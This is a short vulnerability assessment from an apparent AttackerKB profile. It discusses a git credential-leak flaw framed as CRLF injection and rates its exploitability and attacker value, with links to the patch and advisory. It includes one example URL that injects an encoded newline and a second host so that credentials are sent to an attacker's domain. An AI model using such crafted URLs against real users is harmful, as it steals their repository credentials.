Green-m (7)
Last Login: October 14, 2020
Green-m's Latest (1) Contributions
Technical Analysis
The exploitability is very easy
This vuln is just a CRLF injection in my opinion.
You could offer the URL like https://one.example.com?%0ahost=two.example.com/
so that the credential would be sent to two.example.com
which the attacker owns.
The value is limited
I guess there are some prerequisites for attack :
A subdomain name, has the same main domain name as the target.
The victim store or caches the credentials (It’s not the default behavior).
May need user interactions. The exploit usually occurred when the user runs
git clone <URL>
.
That’s why I prefer the value for the attacker is low
.
Another interesting scenario
This vuln probably affected the App and service based on git
, like GitLab
(Not include GitLab
).
These services may allow users to import or remote clone some repo, this vuln would occur.
Original patch
https://github.com/git/git/commit/9a6bbee8006c24b46a85d29e7b38cfa79e9ab21b
Fix and walkaround
See https://github.com/git/git/security/advisories/GHSA-qm7j-c969-7j4q
Been my first comment in this awesome attackerkb community, welcome to discuss and helpful advice.